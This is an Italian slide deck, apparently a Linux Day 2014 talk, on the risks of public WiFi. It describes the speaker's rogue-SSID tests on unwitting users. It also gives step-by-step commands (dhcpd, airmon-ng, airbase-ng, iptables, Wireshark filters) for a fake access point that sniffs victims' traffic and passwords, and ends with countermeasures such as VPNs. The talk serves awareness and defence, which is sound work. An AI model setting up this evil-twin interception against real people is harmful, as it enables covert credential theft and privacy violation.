ݺߣ

ݺߣShare a Scribd company logo
BackBox: WiFi Libero? Ti spio! 
Andrea Draghetti - @AndreaDraghetti 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Agenda 
BackBox Linux – Penetration Testing Distribution 
WiFi Libero? Ti spio! (Lo facciamo davvero....) 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
BackBox Linux 
BackBox è una distribuzione GNU/Linux derivata da Ubuntu 
nata nel 2010 per volontà di Raffaele Forte, progettata per 
eseguire Penetration Test e Security Assessment fornisce 
un insieme di strumenti che facilitano l'analisi di reti e sistemi 
informatici. Essa integra in un ambiente desktop gli strumenti 
necessari ad un ethical hacker per eseguire test di sicurezza. 
Recentemente offre supporto anche per l'Informatica 
Forense e la Mobile Analysis! 
BackBox è Open Source e Free! 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
BackBox Screen 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Top 100 Distro 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
BackBox Link 
Sito ufficiale: www.backbox.org 
Wiki: wiki.backbox.org 
Forum: forum.backbox.org 
Facebook Group: www.facebook.com/groups/backbox 
Mirror Garr: http://mirror3.mirror.garr.it/mirrors/backbox/ 
Mirror OS: http://backbox.oversecurity.net/downloads/ 
Repository: https://launchpad.net/~backbox 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Un Caso Reale 
Sempre più connessi... 
Foto: Xcelus 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Smartphone nel Mondo 
Fonte: Il Sole 24 Ore 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Smartphone in Italia 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
WiFi finalmente libero 
Il 23 Luglio 2013 è stato definitivamente approvato l’emendamento che liberalizza 
le reti WiFi in Italia. 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Smartphone e WiFi Italiano 
Fonte: Cisco – Febbraio '14 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
WiFi Libero e Utilizzo all'estero 
Ecco i principali risultati emersi dalla ricerca condotta negli UK: 
● Il 31% del campione accede almeno una volta alla settimana a servizi Wi-Fi 
pubblici per consultare dati aziendali confidenziali, e in media, gli intervistati si 
collegano 15 volte a settimana a reti Wi-Fi aperte e poco sicure 
● Il 52% dei pendolari teme che i propri dati possano essere intercettati durante 
il collegamento a una rete Wi-Fi pubblica ma, ciò nonostante, continua 
comunque ad utilizzarla 
● La metà degli intervistati vive come una frustrazione l’indisponibilità di reti 
Wi-Fi, a dimostrazione di come gli utenti ormai percepiscano questo servizio 
come indispensabile nella vita di tutti i giorni 
● Il 20% dei dispositivi mobili non ha sistemi di sicurezza attivati, neppure una 
password o un codice PIN, e solo il 5% ha adottato policy di sicurezza corporate 
Fonte: GFI Software™ 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
WiFi Libero e Utilizzo Italiano 
Ho fatto una simulazione, con una Internet Key WiFi, alla Stazione 
Termini di Roma a Settembre 2013! 
SSID WiFi: „Free WiFi Termini“ 
Utenti collegati contemporaneamente: 7 
Utenti totali: ~16 
Durata Test: ~1h 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
WiFi Libero e Utilizzo Italiano 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Incauto Collegamento 
Risultato: 
16 persone in circa un ora si sono collegate ad una rete WiFi 
sconosciuta, attratte dal plausibile nome di rete! 
16utenti : 1h = Xutenti : 24h 
In una giornata il mio Access Point poteva raggiungere 384 
utenti con un segnale che copre circa 7mt! 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Eh ma nel 2014?! 
Il primo test l'ho contodotto un anno fa! 
Per essere sicuro l'ho ripetuto in un luogo 
pubblico lo scorso 20 Ottobre nell'orario 
di punta... 
Utenti collegati contemporaneamente: 5 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014 
Utenti totali: ~7 
Durata Test: ~7minuti 
7utenti : 7minuti = Xutenti : 60minuti 
60utenti/h
Ero tra voi... 
Il test l'ho condotto all'Istituto Tecnico Alberghetti alle 7:40 prima dell'ingresso nelle aule! 
SSID WiFi: „Free WiFi Alberghetti“ 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Ethical Hacking 
Se le mie intenzioni non fossero state pacifiche? 
Cosa potevo ottenere dagli utenti collegati al WiFi? 
Sfruttando un Access Point più 
potente/professionale? 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Fake Access Point 
Creando un finto Access Point garantisco agli utenti di 
collegarsi ad internet e senza che loro si accorgano di nulla 
posso intercettare/sniffare tutto il traffico che generano. 
Otterrò: 
Cronologia di navigazione, eMail, Ricerche, Password, ecc 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Dimostrazione 
Non ci credete? 
Proviamo assieme! 
Occorrente: 
● BackBox Linux 
● Collegamento a Internet 
● Adattatore WiFi USB 
● Server DHCP 
● Tanta volontà... :) 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Installiamo il DHCP Server 
$ sudo -s 
$ apt-get update && apt-get install dhcp3-server 
$ gedit /etc/dhcpd.conf 
# Sample /etc/dhcpd.conf 
# FakeAP by Andrea Draghetti 
default-lease-time 600; 
max-lease-time 7200; 
option subnet-mask 255.255.255.0; 
option broadcast-address 192.168.0.255; 
option routers 192.168.0.1; 
option domain-name-servers 208.67.222.222; #OpenDNS 
subnet 192.168.0.0 netmask 255.255.255.0 { 
range 192.168.0.10 192.168.0.100; 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014 
}
Prepariamo l'interfaccia di Rete 
$ sudo -s 
$ airmon-ng check kill 
$ ifconfig eth0 down 
$ ifconfig eth0 192.168.2.105 broadcast 255.255.255.0 
$ route add default gateway 192.168.2.1 
$ ifconfig eth0 up 
eth0 è l'interfaccia di rete collegata ad internet. 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Monitor Mode 
$ sudo -s 
$ airmon-ng start wlan0 
wlan0 è l’attuale interfaccia di rete wireless, se non conoscente la vostra interfaccia 
di rete wireless digitare il comando: iwconfig 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Fake AP 
$ sudo -s 
$ airbase-ng --essid FakeAP -c 6 -v mon0 
mon0 è interfaccia di rete creata nel passo precedente, ovvero con la funzione di 
Monitor Mode. Se non ricordate l’interfaccia di rete creata digitare il comando: iwconfig 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
NetMask e Subnet 
(apriamo un nuovo terminale) 
$ sudo -s 
$ ifconfig at0 up 
$ ifconfig at0 192.168.0.1 netmask 255.255.255.0 
$ route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1 
at0 è interfaccia di rete creata nel passo precedente, ovvero con la funzione di Fake AP. 
Se non ricordate l’interfaccia di rete creata digitare il comando: iwconfig 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Start DHCP Server 
$ sudo -s 
$ touch /var/run/dhcpd.pid 
$ chmod 777 /var/run/dhcpd.pid 
$ dhcpd -d -f -cf /etc/dhcpd.conf at0 
at0 è interfaccia di rete creata con la procedura di Fake AP. Se non ricordate 
l’interfaccia di rete creata digitare il comando: iwconfig 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
IP Tables 
(apriamo un nuovo terminale) 
$ sudo -s 
$ iptables --flush 
$ iptables --table nat --flush 
$ iptables --delete-chain 
$ iptables --table nat --delete-chain 
$ echo 1 > /proc/sys/net/ipv4/ip_forward 
$ iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE 
$ iptables --append FORWARD --in-interface at0 -j ACCEPT 
$ iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1 
eth0 è l’interfaccia di rete realmente collegata ad internet 
at0 è l’interfaccia del Fake AP 
192.168.1.1 è il reale gateway, se non lo conoscete digitate il comando: route -n 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
WireShark 
$ sudo -s 
$ wireshark 
Visionare l'interfaccia at0 
Filtri consigliati: 
● tcp contains XXX Cerca la parola XXX in tutti i pacchetti TCP 
● http.request Visualizza tutto il traffico GET e POST 
● http Visualizza tutto il traffico HTTP 
● ssl 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Aneddoti 
Fonte: Paolo Attivissimo 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
The Fappening 
Un incredibile storia di accesso abusivo ai profili 
Cloud di centinaia di star di Hollywood, e 
conseguente pubblicazione online di Foto e 
Video intimi scattate con i loro smartphone! 
● Selena Gomez 
● Jennifer Lawrence 
● Melanie Laurent 
● Lizzy Caplan 
● Rihanna (in foto) 
● Emily Browning 
● Jenny McCarthy 
● Avril Lavigne 
● Jessica Alba 
● Kaley Cuoco 
● Lady Gaga 
● Hillary Duff 
● ... 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Ipotesi: Fappening & Captive Portal 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014 
Attraverso un Captive Portal, 
necessario per accedere ad 
una rete WiFi in uno o più 
eventi cinematografici, hanno 
indotto i VIP a registrarsi. 
L'errato utilizzo della 
medesima password per 
più servizi ha permesso agli 
attaccanti di accedere ai 
servizi Cloud delle vittime e 
di sottrare le Foto e Video 
intimi.
Contromisure 
La prima regola è DIFFIDATE, sfruttate la vostra offerta 
Internet! 
Ma a volte è indispensabile collegarsi ad un Access Point 
sconosciuto, possiamo proteggerci? 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
VPN 
Una Virtual Private Network permette di collegare in modo sicuro due estremi di una 
connessione tramite una rete non dedicata, tipicamente utilizzando internet. Si può vedere 
una VPN come l'estensione su scala geografica di una rete locale privata che collega tra 
loro terminali dislocati su tutto il territorio sfruttando una rete IP pubblica e realizzando una 
rete LAN, detta appunto virtuale e privata, logicamente del tutto equivalente ad una 
infrastruttura fisica di rete appositamente dedicata. 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Server VPN? 
È possibile crearsi un proprio Server VPN: 
Sfruttando DD-WRT, firmware Open Source per il vostro Router, se 
è compatibile. 
Implementando pfSense, firewall/router software open source 
basato su FreeBSD, configurabile su un comune computer. 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Contromisura Estrema 
Black Hole Data Bag isola il 
proprio dispositivo da qualsiasi 
segnale 2G, 3G o 4G oltre ai 
segnali WiFi, Bluetooth e NFC! 
La vostra privacy è assicurata! 
Fonte: D3Lab 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Domande... 
? 
Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group 
#LinuxDay2014
Ad

Recommended

Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Andrea Draghetti
BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!
Andrea Draghetti
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
Andrea Draghetti
BackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTF
Andrea Draghetti
BackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration Test
Andrea Draghetti
Le fasi di un Penetration testing
Le fasi di un Penetration testing
Alessandra Zullo
Linux per la Computer Forensics: i motivi di una scelta
Linux per la Computer Forensics: i motivi di una scelta
denis frati
2004: Webbit Padova 04: Presentazione Sikurezza.Org
2004: Webbit Padova 04: Presentazione Sikurezza.Org
Fabio Pietrosanti
Fonera wifi libero per tutti - Linux Day 2010 - Università Salerno
Fonera wifi libero per tutti - Linux Day 2010 - Università Salerno
Infoweblan
Presentazione Ninux al LinuxDay Roma 2012
Presentazione Ninux al LinuxDay Roma 2012
Claudio Mignanti
Smau Milano 2016 - Newen
Smau Milano 2016 - Newen
SMAU
Network configuration - IPTables firewall
Network configuration - IPTables firewall
Fulvio Corno
Oltre I firewall
Oltre I firewall
Gianluca GMin
Open WiFi solution for Public Administrator and University
Open WiFi solution for Public Administrator and University
Maurizio Goretti
Privacy in enigmate
Privacy in enigmate
Alessandro Selli
Wi-Fi e sicurezza. Intervento di Marinella Scarico.
Wi-Fi e sicurezza. Intervento di Marinella Scarico.
Girl Geek Dinners Milano
Servizio di Connettività d'Ateneo - Network and services provisioning automation
Servizio di Connettività d'Ateneo - Network and services provisioning automation
Digital Transformation Team - Italian Government
Sistemi Middleware - Communications
Sistemi Middleware - Communications
Federico Barocci
Sharing city, dalla visione alle realtà - Common net
Sharing city, dalla visione alle realtà - Common net
FPA
App Graders - Digital Areas
App Graders - Digital Areas
Pamela Palaco Ramos
Claudio Cardinali - Virtualizzazione. Di tutti. Per tutti. - LINUX LTSP KVM S...
Claudio Cardinali - Virtualizzazione. Di tutti. Per tutti. - LINUX LTSP KVM S...
Claudio Cardinali
Fict 1
Fict 1
Luca Cicchelli
Hacking Access Point con Firmware Open Source
Hacking Access Point con Firmware Open Source
Claudio Cardinali
17 Il computer connesso -- 1
17 Il computer connesso -- 1
Federico Gobbo
Reti Wireless Metropolitane
Reti Wireless Metropolitane
WiFighters
Hax N°6 Versione Speciale Linuxday 2008
Hax N°6 Versione Speciale Linuxday 2008
Gaetano Zappulla
Alessandrini al mix
Alessandrini al mix
informistica
There's something about FON
There's something about FON
dema
Frodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisure
Andrea Draghetti
Phishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzione
Andrea Draghetti

More Related Content

Similar to BackBox: WiFi Libero? Ti spio! (20)

Fonera wifi libero per tutti - Linux Day 2010 - Università Salerno
Fonera wifi libero per tutti - Linux Day 2010 - Università Salerno
Infoweblan
Presentazione Ninux al LinuxDay Roma 2012
Presentazione Ninux al LinuxDay Roma 2012
Claudio Mignanti
Smau Milano 2016 - Newen
Smau Milano 2016 - Newen
SMAU
Network configuration - IPTables firewall
Network configuration - IPTables firewall
Fulvio Corno
Oltre I firewall
Oltre I firewall
Gianluca GMin
Open WiFi solution for Public Administrator and University
Open WiFi solution for Public Administrator and University
Maurizio Goretti
Privacy in enigmate
Privacy in enigmate
Alessandro Selli
Wi-Fi e sicurezza. Intervento di Marinella Scarico.
Wi-Fi e sicurezza. Intervento di Marinella Scarico.
Girl Geek Dinners Milano
Servizio di Connettività d'Ateneo - Network and services provisioning automation
Servizio di Connettività d'Ateneo - Network and services provisioning automation
Digital Transformation Team - Italian Government
Sistemi Middleware - Communications
Sistemi Middleware - Communications
Federico Barocci
Sharing city, dalla visione alle realtà - Common net
Sharing city, dalla visione alle realtà - Common net
FPA
App Graders - Digital Areas
App Graders - Digital Areas
Pamela Palaco Ramos
Claudio Cardinali - Virtualizzazione. Di tutti. Per tutti. - LINUX LTSP KVM S...
Claudio Cardinali - Virtualizzazione. Di tutti. Per tutti. - LINUX LTSP KVM S...
Claudio Cardinali
Fict 1
Fict 1
Luca Cicchelli
Hacking Access Point con Firmware Open Source
Hacking Access Point con Firmware Open Source
Claudio Cardinali
17 Il computer connesso -- 1
17 Il computer connesso -- 1
Federico Gobbo
Reti Wireless Metropolitane
Reti Wireless Metropolitane
WiFighters
Hax N°6 Versione Speciale Linuxday 2008
Hax N°6 Versione Speciale Linuxday 2008
Gaetano Zappulla
Alessandrini al mix
Alessandrini al mix
informistica
There's something about FON
There's something about FON
dema
Fonera wifi libero per tutti - Linux Day 2010 - Università Salerno
Fonera wifi libero per tutti - Linux Day 2010 - Università Salerno
Infoweblan
Presentazione Ninux al LinuxDay Roma 2012
Presentazione Ninux al LinuxDay Roma 2012
Claudio Mignanti
Smau Milano 2016 - Newen
Smau Milano 2016 - Newen
SMAU
Network configuration - IPTables firewall
Network configuration - IPTables firewall
Fulvio Corno
Open WiFi solution for Public Administrator and University
Open WiFi solution for Public Administrator and University
Maurizio Goretti
Wi-Fi e sicurezza. Intervento di Marinella Scarico.
Wi-Fi e sicurezza. Intervento di Marinella Scarico.
Girl Geek Dinners Milano
Sistemi Middleware - Communications
Sistemi Middleware - Communications
Federico Barocci
Sharing city, dalla visione alle realtà - Common net
Sharing city, dalla visione alle realtà - Common net
FPA
Claudio Cardinali - Virtualizzazione. Di tutti. Per tutti. - LINUX LTSP KVM S...
Claudio Cardinali - Virtualizzazione. Di tutti. Per tutti. - LINUX LTSP KVM S...
Claudio Cardinali
Hacking Access Point con Firmware Open Source
Hacking Access Point con Firmware Open Source
Claudio Cardinali
17 Il computer connesso -- 1
17 Il computer connesso -- 1
Federico Gobbo
Reti Wireless Metropolitane
Reti Wireless Metropolitane
WiFighters
Hax N°6 Versione Speciale Linuxday 2008
Hax N°6 Versione Speciale Linuxday 2008
Gaetano Zappulla
There's something about FON
There's something about FON
dema

More from Andrea Draghetti (14)

Frodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisure
Andrea Draghetti
Phishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzione
Andrea Draghetti
Gophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishing
Andrea Draghetti
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Andrea Draghetti
Let’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklists
Andrea Draghetti
Cyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusione
Andrea Draghetti
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e Sicurezza
Andrea Draghetti
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Andrea Draghetti
Errori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativo
Andrea Draghetti
Hacking Lab con ProxMox e Metasploitable
Hacking Lab con ProxMox e Metasploitable
Andrea Draghetti
Phishing: One Shot Many Victims
Phishing: One Shot Many Victims
Andrea Draghetti
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e Contromisure
Andrea Draghetti
Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016
Andrea Draghetti
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
Andrea Draghetti
Frodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisure
Andrea Draghetti
Phishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzione
Andrea Draghetti
Gophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishing
Andrea Draghetti
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Andrea Draghetti
Let’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklists
Andrea Draghetti
Cyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusione
Andrea Draghetti
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Andrea Draghetti
Errori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativo
Andrea Draghetti
Hacking Lab con ProxMox e Metasploitable
Hacking Lab con ProxMox e Metasploitable
Andrea Draghetti
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e Contromisure
Andrea Draghetti
Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016
Andrea Draghetti
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
Andrea Draghetti
Ad

BackBox: WiFi Libero? Ti spio!

  • 1. BackBox: WiFi Libero? Ti spio! Andrea Draghetti - @AndreaDraghetti Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 2. Agenda BackBox Linux – Penetration Testing Distribution WiFi Libero? Ti spio! (Lo facciamo davvero....) Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 3. BackBox Linux BackBox è una distribuzione GNU/Linux derivata da Ubuntu nata nel 2010 per volontà di Raffaele Forte, progettata per eseguire Penetration Test e Security Assessment fornisce un insieme di strumenti che facilitano l'analisi di reti e sistemi informatici. Essa integra in un ambiente desktop gli strumenti necessari ad un ethical hacker per eseguire test di sicurezza. Recentemente offre supporto anche per l'Informatica Forense e la Mobile Analysis! BackBox è Open Source e Free! Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 4. BackBox Screen Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 5. Top 100 Distro Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 6. BackBox Link Sito ufficiale: www.backbox.org Wiki: wiki.backbox.org Forum: forum.backbox.org Facebook Group: www.facebook.com/groups/backbox Mirror Garr: http://mirror3.mirror.garr.it/mirrors/backbox/ Mirror OS: http://backbox.oversecurity.net/downloads/ Repository: https://launchpad.net/~backbox Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 7. Un Caso Reale Sempre più connessi... Foto: Xcelus Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 8. Smartphone nel Mondo Fonte: Il Sole 24 Ore Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 9. Smartphone in Italia Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 10. WiFi finalmente libero Il 23 Luglio 2013 è stato definitivamente approvato l’emendamento che liberalizza le reti WiFi in Italia. Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 11. Smartphone e WiFi Italiano Fonte: Cisco – Febbraio '14 Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 12. WiFi Libero e Utilizzo all'estero Ecco i principali risultati emersi dalla ricerca condotta negli UK: ● Il 31% del campione accede almeno una volta alla settimana a servizi Wi-Fi pubblici per consultare dati aziendali confidenziali, e in media, gli intervistati si collegano 15 volte a settimana a reti Wi-Fi aperte e poco sicure ● Il 52% dei pendolari teme che i propri dati possano essere intercettati durante il collegamento a una rete Wi-Fi pubblica ma, ciò nonostante, continua comunque ad utilizzarla ● La metà degli intervistati vive come una frustrazione l’indisponibilità di reti Wi-Fi, a dimostrazione di come gli utenti ormai percepiscano questo servizio come indispensabile nella vita di tutti i giorni ● Il 20% dei dispositivi mobili non ha sistemi di sicurezza attivati, neppure una password o un codice PIN, e solo il 5% ha adottato policy di sicurezza corporate Fonte: GFI Software™ Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 13. WiFi Libero e Utilizzo Italiano Ho fatto una simulazione, con una Internet Key WiFi, alla Stazione Termini di Roma a Settembre 2013! SSID WiFi: „Free WiFi Termini“ Utenti collegati contemporaneamente: 7 Utenti totali: ~16 Durata Test: ~1h Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 14. WiFi Libero e Utilizzo Italiano Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 15. Incauto Collegamento Risultato: 16 persone in circa un ora si sono collegate ad una rete WiFi sconosciuta, attratte dal plausibile nome di rete! 16utenti : 1h = Xutenti : 24h In una giornata il mio Access Point poteva raggiungere 384 utenti con un segnale che copre circa 7mt! Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 16. Eh ma nel 2014?! Il primo test l'ho contodotto un anno fa! Per essere sicuro l'ho ripetuto in un luogo pubblico lo scorso 20 Ottobre nell'orario di punta... Utenti collegati contemporaneamente: 5 Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014 Utenti totali: ~7 Durata Test: ~7minuti 7utenti : 7minuti = Xutenti : 60minuti 60utenti/h
  • 17. Ero tra voi... Il test l'ho condotto all'Istituto Tecnico Alberghetti alle 7:40 prima dell'ingresso nelle aule! SSID WiFi: „Free WiFi Alberghetti“ Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 18. Ethical Hacking Se le mie intenzioni non fossero state pacifiche? Cosa potevo ottenere dagli utenti collegati al WiFi? Sfruttando un Access Point più potente/professionale? Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 19. Fake Access Point Creando un finto Access Point garantisco agli utenti di collegarsi ad internet e senza che loro si accorgano di nulla posso intercettare/sniffare tutto il traffico che generano. Otterrò: Cronologia di navigazione, eMail, Ricerche, Password, ecc Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 20. Dimostrazione Non ci credete? Proviamo assieme! Occorrente: ● BackBox Linux ● Collegamento a Internet ● Adattatore WiFi USB ● Server DHCP ● Tanta volontà... :) Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 21. Installiamo il DHCP Server $ sudo -s $ apt-get update && apt-get install dhcp3-server $ gedit /etc/dhcpd.conf # Sample /etc/dhcpd.conf # FakeAP by Andrea Draghetti default-lease-time 600; max-lease-time 7200; option subnet-mask 255.255.255.0; option broadcast-address 192.168.0.255; option routers 192.168.0.1; option domain-name-servers 208.67.222.222; #OpenDNS subnet 192.168.0.0 netmask 255.255.255.0 { range 192.168.0.10 192.168.0.100; Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014 }
  • 22. Prepariamo l'interfaccia di Rete $ sudo -s $ airmon-ng check kill $ ifconfig eth0 down $ ifconfig eth0 192.168.2.105 broadcast 255.255.255.0 $ route add default gateway 192.168.2.1 $ ifconfig eth0 up eth0 è l'interfaccia di rete collegata ad internet. Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 23. Monitor Mode $ sudo -s $ airmon-ng start wlan0 wlan0 è l’attuale interfaccia di rete wireless, se non conoscente la vostra interfaccia di rete wireless digitare il comando: iwconfig Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 24. Fake AP $ sudo -s $ airbase-ng --essid FakeAP -c 6 -v mon0 mon0 è interfaccia di rete creata nel passo precedente, ovvero con la funzione di Monitor Mode. Se non ricordate l’interfaccia di rete creata digitare il comando: iwconfig Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 25. NetMask e Subnet (apriamo un nuovo terminale) $ sudo -s $ ifconfig at0 up $ ifconfig at0 192.168.0.1 netmask 255.255.255.0 $ route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1 at0 è interfaccia di rete creata nel passo precedente, ovvero con la funzione di Fake AP. Se non ricordate l’interfaccia di rete creata digitare il comando: iwconfig Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 26. Start DHCP Server $ sudo -s $ touch /var/run/dhcpd.pid $ chmod 777 /var/run/dhcpd.pid $ dhcpd -d -f -cf /etc/dhcpd.conf at0 at0 è interfaccia di rete creata con la procedura di Fake AP. Se non ricordate l’interfaccia di rete creata digitare il comando: iwconfig Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 27. IP Tables (apriamo un nuovo terminale) $ sudo -s $ iptables --flush $ iptables --table nat --flush $ iptables --delete-chain $ iptables --table nat --delete-chain $ echo 1 > /proc/sys/net/ipv4/ip_forward $ iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE $ iptables --append FORWARD --in-interface at0 -j ACCEPT $ iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1 eth0 è l’interfaccia di rete realmente collegata ad internet at0 è l’interfaccia del Fake AP 192.168.1.1 è il reale gateway, se non lo conoscete digitate il comando: route -n Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 28. WireShark $ sudo -s $ wireshark Visionare l'interfaccia at0 Filtri consigliati: ● tcp contains XXX Cerca la parola XXX in tutti i pacchetti TCP ● http.request Visualizza tutto il traffico GET e POST ● http Visualizza tutto il traffico HTTP ● ssl Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
  • 29. Aneddoti Fonte: Paolo Attivissimo Linux Day 25 Ottobre 2014 – Imola e Faenza Linux User Group #LinuxDay2014
